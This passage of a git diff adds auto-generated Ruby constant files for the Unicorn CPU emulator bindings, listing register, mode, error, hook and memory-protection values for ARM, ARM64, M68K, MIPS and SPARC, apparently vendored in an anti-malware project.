= 161 + UC_ARM64_REG_S26 = 162 + UC_ARM64_REG_S27 = 163 + UC_ARM64_REG_S28 = 164 + UC_ARM64_REG_S29 = 165 + UC_ARM64_REG_S30 = 166 + UC_ARM64_REG_S31 = 167 + UC_ARM64_REG_W0 = 168 + UC_ARM64_REG_W1 = 169 + UC_ARM64_REG_W2 = 170 + UC_ARM64_REG_W3 = 171 + UC_ARM64_REG_W4 = 172 + UC_ARM64_REG_W5 = 173 + UC_ARM64_REG_W6 = 174 + UC_ARM64_REG_W7 = 175 + UC_ARM64_REG_W8 = 176 + UC_ARM64_REG_W9 = 177 + UC_ARM64_REG_W10 = 178 + UC_ARM64_REG_W11 = 179 + UC_ARM64_REG_W12 = 180 + UC_ARM64_REG_W13 = 181 + UC_ARM64_REG_W14 = 182 + UC_ARM64_REG_W15 = 183 + UC_ARM64_REG_W16 = 184 + UC_ARM64_REG_W17 = 185 + UC_ARM64_REG_W18 = 186 + UC_ARM64_REG_W19 = 187 + UC_ARM64_REG_W20 = 188 + UC_ARM64_REG_W21 = 189 + UC_ARM64_REG_W22 = 190 + UC_ARM64_REG_W23 = 191 + UC_ARM64_REG_W24 = 192 + UC_ARM64_REG_W25 = 193 + UC_ARM64_REG_W26 = 194 + UC_ARM64_REG_W27 = 195 + UC_ARM64_REG_W28 = 196 + UC_ARM64_REG_W29 = 197 + UC_ARM64_REG_W30 = 198 + UC_ARM64_REG_X0 = 199 + UC_ARM64_REG_X1 = 200 + UC_ARM64_REG_X2 = 201 + UC_ARM64_REG_X3 = 202 + UC_ARM64_REG_X4 = 203 + UC_ARM64_REG_X5 = 204 + UC_ARM64_REG_X6 = 205 + UC_ARM64_REG_X7 = 206 + UC_ARM64_REG_X8 = 207 + UC_ARM64_REG_X9 = 208 + UC_ARM64_REG_X10 = 209 + UC_ARM64_REG_X11 = 210 + UC_ARM64_REG_X12 = 211 + UC_ARM64_REG_X13 = 212 + UC_ARM64_REG_X14 = 213 + UC_ARM64_REG_X15 = 214 + UC_ARM64_REG_X16 = 215 + UC_ARM64_REG_X17 = 216 + UC_ARM64_REG_X18 = 217 + UC_ARM64_REG_X19 = 218 + UC_ARM64_REG_X20 = 219 + UC_ARM64_REG_X21 = 220 + UC_ARM64_REG_X22 = 221 + UC_ARM64_REG_X23 = 222 + UC_ARM64_REG_X24 = 223 + UC_ARM64_REG_X25 = 224 + UC_ARM64_REG_X26 = 225 + UC_ARM64_REG_X27 = 226 + UC_ARM64_REG_X28 = 227 + UC_ARM64_REG_V0 = 228 + UC_ARM64_REG_V1 = 229 + UC_ARM64_REG_V2 = 230 + UC_ARM64_REG_V3 = 231 + UC_ARM64_REG_V4 = 232 + UC_ARM64_REG_V5 = 233 + UC_ARM64_REG_V6 = 234 + UC_ARM64_REG_V7 = 235 + UC_ARM64_REG_V8 = 236 + UC_ARM64_REG_V9 = 237 + UC_ARM64_REG_V10 = 238 + UC_ARM64_REG_V11 = 239 + UC_ARM64_REG_V12 = 240 + UC_ARM64_REG_V13 = 241 + UC_ARM64_REG_V14 = 
242 + UC_ARM64_REG_V15 = 243 + UC_ARM64_REG_V16 = 244 + UC_ARM64_REG_V17 = 245 + UC_ARM64_REG_V18 = 246 + UC_ARM64_REG_V19 = 247 + UC_ARM64_REG_V20 = 248 + UC_ARM64_REG_V21 = 249 + UC_ARM64_REG_V22 = 250 + UC_ARM64_REG_V23 = 251 + UC_ARM64_REG_V24 = 252 + UC_ARM64_REG_V25 = 253 + UC_ARM64_REG_V26 = 254 + UC_ARM64_REG_V27 = 255 + UC_ARM64_REG_V28 = 256 + UC_ARM64_REG_V29 = 257 + UC_ARM64_REG_V30 = 258 + UC_ARM64_REG_V31 = 259 + +# pseudo registers + UC_ARM64_REG_PC = 260 + UC_ARM64_REG_CPACR_EL1 = 261 + +# thread registers + UC_ARM64_REG_TPIDR_EL0 = 262 + UC_ARM64_REG_TPIDRRO_EL0 = 263 + UC_ARM64_REG_TPIDR_EL1 = 264 + UC_ARM64_REG_PSTATE = 265 + +# exception link registers + UC_ARM64_REG_ELR_EL0 = 266 + UC_ARM64_REG_ELR_EL1 = 267 + UC_ARM64_REG_ELR_EL2 = 268 + UC_ARM64_REG_ELR_EL3 = 269 + +# stack pointers registers + UC_ARM64_REG_SP_EL0 = 270 + UC_ARM64_REG_SP_EL1 = 271 + UC_ARM64_REG_SP_EL2 = 272 + UC_ARM64_REG_SP_EL3 = 273 + +# other CP15 registers + UC_ARM64_REG_TTBR0_EL1 = 274 + UC_ARM64_REG_TTBR1_EL1 = 275 + UC_ARM64_REG_ESR_EL0 = 276 + UC_ARM64_REG_ESR_EL1 = 277 + UC_ARM64_REG_ESR_EL2 = 278 + UC_ARM64_REG_ESR_EL3 = 279 + UC_ARM64_REG_FAR_EL0 = 280 + UC_ARM64_REG_FAR_EL1 = 281 + UC_ARM64_REG_FAR_EL2 = 282 + UC_ARM64_REG_FAR_EL3 = 283 + UC_ARM64_REG_PAR_EL1 = 284 + UC_ARM64_REG_MAIR_EL1 = 285 + UC_ARM64_REG_VBAR_EL0 = 286 + UC_ARM64_REG_VBAR_EL1 = 287 + UC_ARM64_REG_VBAR_EL2 = 288 + UC_ARM64_REG_VBAR_EL3 = 289 + UC_ARM64_REG_ENDING = 290 + +# alias registers + UC_ARM64_REG_IP0 = 215 + UC_ARM64_REG_IP1 = 216 + UC_ARM64_REG_FP = 1 + UC_ARM64_REG_LR = 2 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb new file mode 100644 index 0000000..15df353 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb @@ -0,0 +1,135 
@@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.rb] + +module UnicornEngine + +# ARM registers + + UC_ARM_REG_INVALID = 0 + UC_ARM_REG_APSR = 1 + UC_ARM_REG_APSR_NZCV = 2 + UC_ARM_REG_CPSR = 3 + UC_ARM_REG_FPEXC = 4 + UC_ARM_REG_FPINST = 5 + UC_ARM_REG_FPSCR = 6 + UC_ARM_REG_FPSCR_NZCV = 7 + UC_ARM_REG_FPSID = 8 + UC_ARM_REG_ITSTATE = 9 + UC_ARM_REG_LR = 10 + UC_ARM_REG_PC = 11 + UC_ARM_REG_SP = 12 + UC_ARM_REG_SPSR = 13 + UC_ARM_REG_D0 = 14 + UC_ARM_REG_D1 = 15 + UC_ARM_REG_D2 = 16 + UC_ARM_REG_D3 = 17 + UC_ARM_REG_D4 = 18 + UC_ARM_REG_D5 = 19 + UC_ARM_REG_D6 = 20 + UC_ARM_REG_D7 = 21 + UC_ARM_REG_D8 = 22 + UC_ARM_REG_D9 = 23 + UC_ARM_REG_D10 = 24 + UC_ARM_REG_D11 = 25 + UC_ARM_REG_D12 = 26 + UC_ARM_REG_D13 = 27 + UC_ARM_REG_D14 = 28 + UC_ARM_REG_D15 = 29 + UC_ARM_REG_D16 = 30 + UC_ARM_REG_D17 = 31 + UC_ARM_REG_D18 = 32 + UC_ARM_REG_D19 = 33 + UC_ARM_REG_D20 = 34 + UC_ARM_REG_D21 = 35 + UC_ARM_REG_D22 = 36 + UC_ARM_REG_D23 = 37 + UC_ARM_REG_D24 = 38 + UC_ARM_REG_D25 = 39 + UC_ARM_REG_D26 = 40 + UC_ARM_REG_D27 = 41 + UC_ARM_REG_D28 = 42 + UC_ARM_REG_D29 = 43 + UC_ARM_REG_D30 = 44 + UC_ARM_REG_D31 = 45 + UC_ARM_REG_FPINST2 = 46 + UC_ARM_REG_MVFR0 = 47 + UC_ARM_REG_MVFR1 = 48 + UC_ARM_REG_MVFR2 = 49 + UC_ARM_REG_Q0 = 50 + UC_ARM_REG_Q1 = 51 + UC_ARM_REG_Q2 = 52 + UC_ARM_REG_Q3 = 53 + UC_ARM_REG_Q4 = 54 + UC_ARM_REG_Q5 = 55 + UC_ARM_REG_Q6 = 56 + UC_ARM_REG_Q7 = 57 + UC_ARM_REG_Q8 = 58 + UC_ARM_REG_Q9 = 59 + UC_ARM_REG_Q10 = 60 + UC_ARM_REG_Q11 = 61 + UC_ARM_REG_Q12 = 62 + UC_ARM_REG_Q13 = 63 + UC_ARM_REG_Q14 = 64 + UC_ARM_REG_Q15 = 65 + UC_ARM_REG_R0 = 66 + UC_ARM_REG_R1 = 67 + UC_ARM_REG_R2 = 68 + UC_ARM_REG_R3 = 69 + UC_ARM_REG_R4 = 70 + UC_ARM_REG_R5 = 71 + UC_ARM_REG_R6 = 72 + UC_ARM_REG_R7 = 73 + UC_ARM_REG_R8 = 74 + UC_ARM_REG_R9 = 75 + UC_ARM_REG_R10 = 76 + UC_ARM_REG_R11 = 77 + UC_ARM_REG_R12 = 78 + UC_ARM_REG_S0 = 79 + UC_ARM_REG_S1 = 80 + UC_ARM_REG_S2 = 81 + UC_ARM_REG_S3 = 82 + UC_ARM_REG_S4 = 83 + UC_ARM_REG_S5 = 84 + UC_ARM_REG_S6 
= 85 + UC_ARM_REG_S7 = 86 + UC_ARM_REG_S8 = 87 + UC_ARM_REG_S9 = 88 + UC_ARM_REG_S10 = 89 + UC_ARM_REG_S11 = 90 + UC_ARM_REG_S12 = 91 + UC_ARM_REG_S13 = 92 + UC_ARM_REG_S14 = 93 + UC_ARM_REG_S15 = 94 + UC_ARM_REG_S16 = 95 + UC_ARM_REG_S17 = 96 + UC_ARM_REG_S18 = 97 + UC_ARM_REG_S19 = 98 + UC_ARM_REG_S20 = 99 + UC_ARM_REG_S21 = 100 + UC_ARM_REG_S22 = 101 + UC_ARM_REG_S23 = 102 + UC_ARM_REG_S24 = 103 + UC_ARM_REG_S25 = 104 + UC_ARM_REG_S26 = 105 + UC_ARM_REG_S27 = 106 + UC_ARM_REG_S28 = 107 + UC_ARM_REG_S29 = 108 + UC_ARM_REG_S30 = 109 + UC_ARM_REG_S31 = 110 + UC_ARM_REG_C1_C0_2 = 111 + UC_ARM_REG_C13_C0_2 = 112 + UC_ARM_REG_C13_C0_3 = 113 + UC_ARM_REG_IPSR = 114 + UC_ARM_REG_MSP = 115 + UC_ARM_REG_PSP = 116 + UC_ARM_REG_CONTROL = 117 + UC_ARM_REG_ENDING = 118 + +# alias registers + UC_ARM_REG_R13 = 12 + UC_ARM_REG_R14 = 10 + UC_ARM_REG_R15 = 11 + UC_ARM_REG_SB = 75 + UC_ARM_REG_SL = 76 + UC_ARM_REG_FP = 77 + UC_ARM_REG_IP = 78 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb new file mode 100644 index 0000000..dc64153 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb @@ -0,0 +1,27 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.rb] + +module UnicornEngine + +# M68K registers + + UC_M68K_REG_INVALID = 0 + UC_M68K_REG_A0 = 1 + UC_M68K_REG_A1 = 2 + UC_M68K_REG_A2 = 3 + UC_M68K_REG_A3 = 4 + UC_M68K_REG_A4 = 5 + UC_M68K_REG_A5 = 6 + UC_M68K_REG_A6 = 7 + UC_M68K_REG_A7 = 8 + UC_M68K_REG_D0 = 9 + UC_M68K_REG_D1 = 10 + UC_M68K_REG_D2 = 11 + UC_M68K_REG_D3 = 12 + UC_M68K_REG_D4 = 13 + UC_M68K_REG_D5 = 14 + UC_M68K_REG_D6 = 15 + UC_M68K_REG_D7 = 16 + UC_M68K_REG_SR = 17 + UC_M68K_REG_PC = 18 + UC_M68K_REG_ENDING = 19 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb new file mode 100644 index 0000000..9e8d52e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb @@ -0,0 +1,200 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.rb] + +module UnicornEngine + +# MIPS registers + + UC_MIPS_REG_INVALID = 0 + +# General purpose registers + UC_MIPS_REG_PC = 1 + UC_MIPS_REG_0 = 2 + UC_MIPS_REG_1 = 3 + UC_MIPS_REG_2 = 4 + UC_MIPS_REG_3 = 5 + UC_MIPS_REG_4 = 6 + UC_MIPS_REG_5 = 7 + UC_MIPS_REG_6 = 8 + UC_MIPS_REG_7 = 9 + UC_MIPS_REG_8 = 10 + UC_MIPS_REG_9 = 11 + UC_MIPS_REG_10 = 12 + UC_MIPS_REG_11 = 13 + UC_MIPS_REG_12 = 14 + UC_MIPS_REG_13 = 15 + UC_MIPS_REG_14 = 16 + UC_MIPS_REG_15 = 17 + UC_MIPS_REG_16 = 18 + UC_MIPS_REG_17 = 19 + UC_MIPS_REG_18 = 20 + UC_MIPS_REG_19 = 21 + UC_MIPS_REG_20 = 22 + UC_MIPS_REG_21 = 23 + UC_MIPS_REG_22 = 24 + UC_MIPS_REG_23 = 25 + UC_MIPS_REG_24 = 26 + UC_MIPS_REG_25 = 27 + UC_MIPS_REG_26 = 28 + UC_MIPS_REG_27 = 29 + UC_MIPS_REG_28 = 30 + UC_MIPS_REG_29 = 31 + UC_MIPS_REG_30 = 32 + UC_MIPS_REG_31 = 33 + +# DSP registers + UC_MIPS_REG_DSPCCOND = 34 + UC_MIPS_REG_DSPCARRY = 35 + UC_MIPS_REG_DSPEFI = 36 + UC_MIPS_REG_DSPOUTFLAG = 37 + 
UC_MIPS_REG_DSPOUTFLAG16_19 = 38 + UC_MIPS_REG_DSPOUTFLAG20 = 39 + UC_MIPS_REG_DSPOUTFLAG21 = 40 + UC_MIPS_REG_DSPOUTFLAG22 = 41 + UC_MIPS_REG_DSPOUTFLAG23 = 42 + UC_MIPS_REG_DSPPOS = 43 + UC_MIPS_REG_DSPSCOUNT = 44 + +# ACC registers + UC_MIPS_REG_AC0 = 45 + UC_MIPS_REG_AC1 = 46 + UC_MIPS_REG_AC2 = 47 + UC_MIPS_REG_AC3 = 48 + +# COP registers + UC_MIPS_REG_CC0 = 49 + UC_MIPS_REG_CC1 = 50 + UC_MIPS_REG_CC2 = 51 + UC_MIPS_REG_CC3 = 52 + UC_MIPS_REG_CC4 = 53 + UC_MIPS_REG_CC5 = 54 + UC_MIPS_REG_CC6 = 55 + UC_MIPS_REG_CC7 = 56 + +# FPU registers + UC_MIPS_REG_F0 = 57 + UC_MIPS_REG_F1 = 58 + UC_MIPS_REG_F2 = 59 + UC_MIPS_REG_F3 = 60 + UC_MIPS_REG_F4 = 61 + UC_MIPS_REG_F5 = 62 + UC_MIPS_REG_F6 = 63 + UC_MIPS_REG_F7 = 64 + UC_MIPS_REG_F8 = 65 + UC_MIPS_REG_F9 = 66 + UC_MIPS_REG_F10 = 67 + UC_MIPS_REG_F11 = 68 + UC_MIPS_REG_F12 = 69 + UC_MIPS_REG_F13 = 70 + UC_MIPS_REG_F14 = 71 + UC_MIPS_REG_F15 = 72 + UC_MIPS_REG_F16 = 73 + UC_MIPS_REG_F17 = 74 + UC_MIPS_REG_F18 = 75 + UC_MIPS_REG_F19 = 76 + UC_MIPS_REG_F20 = 77 + UC_MIPS_REG_F21 = 78 + UC_MIPS_REG_F22 = 79 + UC_MIPS_REG_F23 = 80 + UC_MIPS_REG_F24 = 81 + UC_MIPS_REG_F25 = 82 + UC_MIPS_REG_F26 = 83 + UC_MIPS_REG_F27 = 84 + UC_MIPS_REG_F28 = 85 + UC_MIPS_REG_F29 = 86 + UC_MIPS_REG_F30 = 87 + UC_MIPS_REG_F31 = 88 + UC_MIPS_REG_FCC0 = 89 + UC_MIPS_REG_FCC1 = 90 + UC_MIPS_REG_FCC2 = 91 + UC_MIPS_REG_FCC3 = 92 + UC_MIPS_REG_FCC4 = 93 + UC_MIPS_REG_FCC5 = 94 + UC_MIPS_REG_FCC6 = 95 + UC_MIPS_REG_FCC7 = 96 + +# AFPR128 + UC_MIPS_REG_W0 = 97 + UC_MIPS_REG_W1 = 98 + UC_MIPS_REG_W2 = 99 + UC_MIPS_REG_W3 = 100 + UC_MIPS_REG_W4 = 101 + UC_MIPS_REG_W5 = 102 + UC_MIPS_REG_W6 = 103 + UC_MIPS_REG_W7 = 104 + UC_MIPS_REG_W8 = 105 + UC_MIPS_REG_W9 = 106 + UC_MIPS_REG_W10 = 107 + UC_MIPS_REG_W11 = 108 + UC_MIPS_REG_W12 = 109 + UC_MIPS_REG_W13 = 110 + UC_MIPS_REG_W14 = 111 + UC_MIPS_REG_W15 = 112 + UC_MIPS_REG_W16 = 113 + UC_MIPS_REG_W17 = 114 + UC_MIPS_REG_W18 = 115 + UC_MIPS_REG_W19 = 116 + UC_MIPS_REG_W20 = 117 + UC_MIPS_REG_W21 = 118 + 
UC_MIPS_REG_W22 = 119 + UC_MIPS_REG_W23 = 120 + UC_MIPS_REG_W24 = 121 + UC_MIPS_REG_W25 = 122 + UC_MIPS_REG_W26 = 123 + UC_MIPS_REG_W27 = 124 + UC_MIPS_REG_W28 = 125 + UC_MIPS_REG_W29 = 126 + UC_MIPS_REG_W30 = 127 + UC_MIPS_REG_W31 = 128 + UC_MIPS_REG_HI = 129 + UC_MIPS_REG_LO = 130 + UC_MIPS_REG_P0 = 131 + UC_MIPS_REG_P1 = 132 + UC_MIPS_REG_P2 = 133 + UC_MIPS_REG_MPL0 = 134 + UC_MIPS_REG_MPL1 = 135 + UC_MIPS_REG_MPL2 = 136 + UC_MIPS_REG_CP0_CONFIG3 = 137 + UC_MIPS_REG_CP0_USERLOCAL = 138 + UC_MIPS_REG_ENDING = 139 + UC_MIPS_REG_ZERO = 2 + UC_MIPS_REG_AT = 3 + UC_MIPS_REG_V0 = 4 + UC_MIPS_REG_V1 = 5 + UC_MIPS_REG_A0 = 6 + UC_MIPS_REG_A1 = 7 + UC_MIPS_REG_A2 = 8 + UC_MIPS_REG_A3 = 9 + UC_MIPS_REG_T0 = 10 + UC_MIPS_REG_T1 = 11 + UC_MIPS_REG_T2 = 12 + UC_MIPS_REG_T3 = 13 + UC_MIPS_REG_T4 = 14 + UC_MIPS_REG_T5 = 15 + UC_MIPS_REG_T6 = 16 + UC_MIPS_REG_T7 = 17 + UC_MIPS_REG_S0 = 18 + UC_MIPS_REG_S1 = 19 + UC_MIPS_REG_S2 = 20 + UC_MIPS_REG_S3 = 21 + UC_MIPS_REG_S4 = 22 + UC_MIPS_REG_S5 = 23 + UC_MIPS_REG_S6 = 24 + UC_MIPS_REG_S7 = 25 + UC_MIPS_REG_T8 = 26 + UC_MIPS_REG_T9 = 27 + UC_MIPS_REG_K0 = 28 + UC_MIPS_REG_K1 = 29 + UC_MIPS_REG_GP = 30 + UC_MIPS_REG_SP = 31 + UC_MIPS_REG_FP = 32 + UC_MIPS_REG_S8 = 32 + UC_MIPS_REG_RA = 33 + UC_MIPS_REG_HI0 = 45 + UC_MIPS_REG_HI1 = 46 + UC_MIPS_REG_HI2 = 47 + UC_MIPS_REG_HI3 = 48 + UC_MIPS_REG_LO0 = 45 + UC_MIPS_REG_LO1 = 46 + UC_MIPS_REG_LO2 = 47 + UC_MIPS_REG_LO3 = 48 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb new file mode 100644 index 0000000..b5c4247 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb @@ -0,0 +1,99 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.rb] + +module UnicornEngine + +# SPARC registers + + UC_SPARC_REG_INVALID = 0 + UC_SPARC_REG_F0 = 1 + UC_SPARC_REG_F1 = 2 + UC_SPARC_REG_F2 = 3 + UC_SPARC_REG_F3 = 4 + UC_SPARC_REG_F4 = 5 + UC_SPARC_REG_F5 = 6 + UC_SPARC_REG_F6 = 7 + UC_SPARC_REG_F7 = 8 + UC_SPARC_REG_F8 = 9 + UC_SPARC_REG_F9 = 10 + UC_SPARC_REG_F10 = 11 + UC_SPARC_REG_F11 = 12 + UC_SPARC_REG_F12 = 13 + UC_SPARC_REG_F13 = 14 + UC_SPARC_REG_F14 = 15 + UC_SPARC_REG_F15 = 16 + UC_SPARC_REG_F16 = 17 + UC_SPARC_REG_F17 = 18 + UC_SPARC_REG_F18 = 19 + UC_SPARC_REG_F19 = 20 + UC_SPARC_REG_F20 = 21 + UC_SPARC_REG_F21 = 22 + UC_SPARC_REG_F22 = 23 + UC_SPARC_REG_F23 = 24 + UC_SPARC_REG_F24 = 25 + UC_SPARC_REG_F25 = 26 + UC_SPARC_REG_F26 = 27 + UC_SPARC_REG_F27 = 28 + UC_SPARC_REG_F28 = 29 + UC_SPARC_REG_F29 = 30 + UC_SPARC_REG_F30 = 31 + UC_SPARC_REG_F31 = 32 + UC_SPARC_REG_F32 = 33 + UC_SPARC_REG_F34 = 34 + UC_SPARC_REG_F36 = 35 + UC_SPARC_REG_F38 = 36 + UC_SPARC_REG_F40 = 37 + UC_SPARC_REG_F42 = 38 + UC_SPARC_REG_F44 = 39 + UC_SPARC_REG_F46 = 40 + UC_SPARC_REG_F48 = 41 + UC_SPARC_REG_F50 = 42 + UC_SPARC_REG_F52 = 43 + UC_SPARC_REG_F54 = 44 + UC_SPARC_REG_F56 = 45 + UC_SPARC_REG_F58 = 46 + UC_SPARC_REG_F60 = 47 + UC_SPARC_REG_F62 = 48 + UC_SPARC_REG_FCC0 = 49 + UC_SPARC_REG_FCC1 = 50 + UC_SPARC_REG_FCC2 = 51 + UC_SPARC_REG_FCC3 = 52 + UC_SPARC_REG_G0 = 53 + UC_SPARC_REG_G1 = 54 + UC_SPARC_REG_G2 = 55 + UC_SPARC_REG_G3 = 56 + UC_SPARC_REG_G4 = 57 + UC_SPARC_REG_G5 = 58 + UC_SPARC_REG_G6 = 59 + UC_SPARC_REG_G7 = 60 + UC_SPARC_REG_I0 = 61 + UC_SPARC_REG_I1 = 62 + UC_SPARC_REG_I2 = 63 + UC_SPARC_REG_I3 = 64 + UC_SPARC_REG_I4 = 65 + UC_SPARC_REG_I5 = 66 + UC_SPARC_REG_FP = 67 + UC_SPARC_REG_I7 = 68 + UC_SPARC_REG_ICC = 69 + UC_SPARC_REG_L0 = 70 + UC_SPARC_REG_L1 = 71 + UC_SPARC_REG_L2 = 72 + UC_SPARC_REG_L3 = 73 + UC_SPARC_REG_L4 = 74 + UC_SPARC_REG_L5 = 75 + UC_SPARC_REG_L6 = 76 + UC_SPARC_REG_L7 = 77 + UC_SPARC_REG_O0 = 78 + UC_SPARC_REG_O1 = 79 + UC_SPARC_REG_O2 = 
80 + UC_SPARC_REG_O3 = 81 + UC_SPARC_REG_O4 = 82 + UC_SPARC_REG_O5 = 83 + UC_SPARC_REG_SP = 84 + UC_SPARC_REG_O7 = 85 + UC_SPARC_REG_Y = 86 + UC_SPARC_REG_XCC = 87 + UC_SPARC_REG_PC = 88 + UC_SPARC_REG_ENDING = 89 + UC_SPARC_REG_O6 = 84 + UC_SPARC_REG_I6 = 67 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb new file mode 100644 index 0000000..178fac6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb @@ -0,0 +1,111 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.rb] + +module UnicornEngine + UC_API_MAJOR = 1 + + UC_API_MINOR = 0 + UC_VERSION_MAJOR = 1 + + UC_VERSION_MINOR = 0 + UC_VERSION_EXTRA = 2 + UC_SECOND_SCALE = 1000000 + UC_MILISECOND_SCALE = 1000 + UC_ARCH_ARM = 1 + UC_ARCH_ARM64 = 2 + UC_ARCH_MIPS = 3 + UC_ARCH_X86 = 4 + UC_ARCH_PPC = 5 + UC_ARCH_SPARC = 6 + UC_ARCH_M68K = 7 + UC_ARCH_MAX = 8 + + UC_MODE_LITTLE_ENDIAN = 0 + UC_MODE_BIG_ENDIAN = 1073741824 + + UC_MODE_ARM = 0 + UC_MODE_THUMB = 16 + UC_MODE_MCLASS = 32 + UC_MODE_V8 = 64 + UC_MODE_ARM926 = 128 + UC_MODE_ARM946 = 256 + UC_MODE_ARM1176 = 512 + UC_MODE_MICRO = 16 + UC_MODE_MIPS3 = 32 + UC_MODE_MIPS32R6 = 64 + UC_MODE_MIPS32 = 4 + UC_MODE_MIPS64 = 8 + UC_MODE_16 = 2 + UC_MODE_32 = 4 + UC_MODE_64 = 8 + UC_MODE_PPC32 = 4 + UC_MODE_PPC64 = 8 + UC_MODE_QPX = 16 + UC_MODE_SPARC32 = 4 + UC_MODE_SPARC64 = 8 + UC_MODE_V9 = 16 + + UC_ERR_OK = 0 + UC_ERR_NOMEM = 1 + UC_ERR_ARCH = 2 + UC_ERR_HANDLE = 3 + UC_ERR_MODE = 4 + UC_ERR_VERSION = 5 + UC_ERR_READ_UNMAPPED = 6 + UC_ERR_WRITE_UNMAPPED = 7 + UC_ERR_FETCH_UNMAPPED = 8 + UC_ERR_HOOK = 9 + UC_ERR_INSN_INVALID = 10 + UC_ERR_MAP = 11 + UC_ERR_WRITE_PROT = 12 + UC_ERR_READ_PROT = 13 + UC_ERR_FETCH_PROT = 14 + UC_ERR_ARG = 15 + UC_ERR_READ_UNALIGNED = 16 + 
UC_ERR_WRITE_UNALIGNED = 17 + UC_ERR_FETCH_UNALIGNED = 18 + UC_ERR_HOOK_EXIST = 19 + UC_ERR_RESOURCE = 20 + UC_ERR_EXCEPTION = 21 + UC_MEM_READ = 16 + UC_MEM_WRITE = 17 + UC_MEM_FETCH = 18 + UC_MEM_READ_UNMAPPED = 19 + UC_MEM_WRITE_UNMAPPED = 20 + UC_MEM_FETCH_UNMAPPED = 21 + UC_MEM_WRITE_PROT = 22 + UC_MEM_READ_PROT = 23 + UC_MEM_FETCH_PROT = 24 + UC_MEM_READ_AFTER = 25 + UC_HOOK_INTR = 1 + UC_HOOK_INSN = 2 + UC_HOOK_CODE = 4 + UC_HOOK_BLOCK = 8 + UC_HOOK_MEM_READ_UNMAPPED = 16 + UC_HOOK_MEM_WRITE_UNMAPPED = 32 + UC_HOOK_MEM_FETCH_UNMAPPED = 64 + UC_HOOK_MEM_READ_PROT = 128 + UC_HOOK_MEM_WRITE_PROT = 256 + UC_HOOK_MEM_FETCH_PROT = 512 + UC_HOOK_MEM_READ = 1024 + UC_HOOK_MEM_WRITE = 2048 + UC_HOOK_MEM_FETCH = 4096 + UC_HOOK_MEM_READ_AFTER = 8192 + UC_HOOK_INSN_INVALID = 16384 + UC_HOOK_MEM_UNMAPPED = 112 + UC_HOOK_MEM_PROT = 896 + UC_HOOK_MEM_READ_INVALID = 144 + UC_HOOK_MEM_WRITE_INVALID = 288 + UC_HOOK_MEM_FETCH_INVALID = 576 + UC_HOOK_MEM_INVALID = 1008 + UC_HOOK_MEM_VALID = 7168 + UC_QUERY_MODE = 1 + UC_QUERY_PAGE_SIZE = 2 + UC_QUERY_ARCH = 3 + UC_QUERY_TIMEOUT = 4 + + UC_PROT_NONE = 0 + UC_PROT_READ = 1 + UC_PROT_WRITE = 2 + UC_PROT_EXEC = 4 + UC_PROT_ALL = 7 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb new file mode 100644 index 0000000..bca7c5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb @@ -0,0 +1,3 @@ +module Unicorn + VERSION = "1.0.1" +end diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb new file mode 100644 index 0000000..8063eec --- /dev/null +++ 
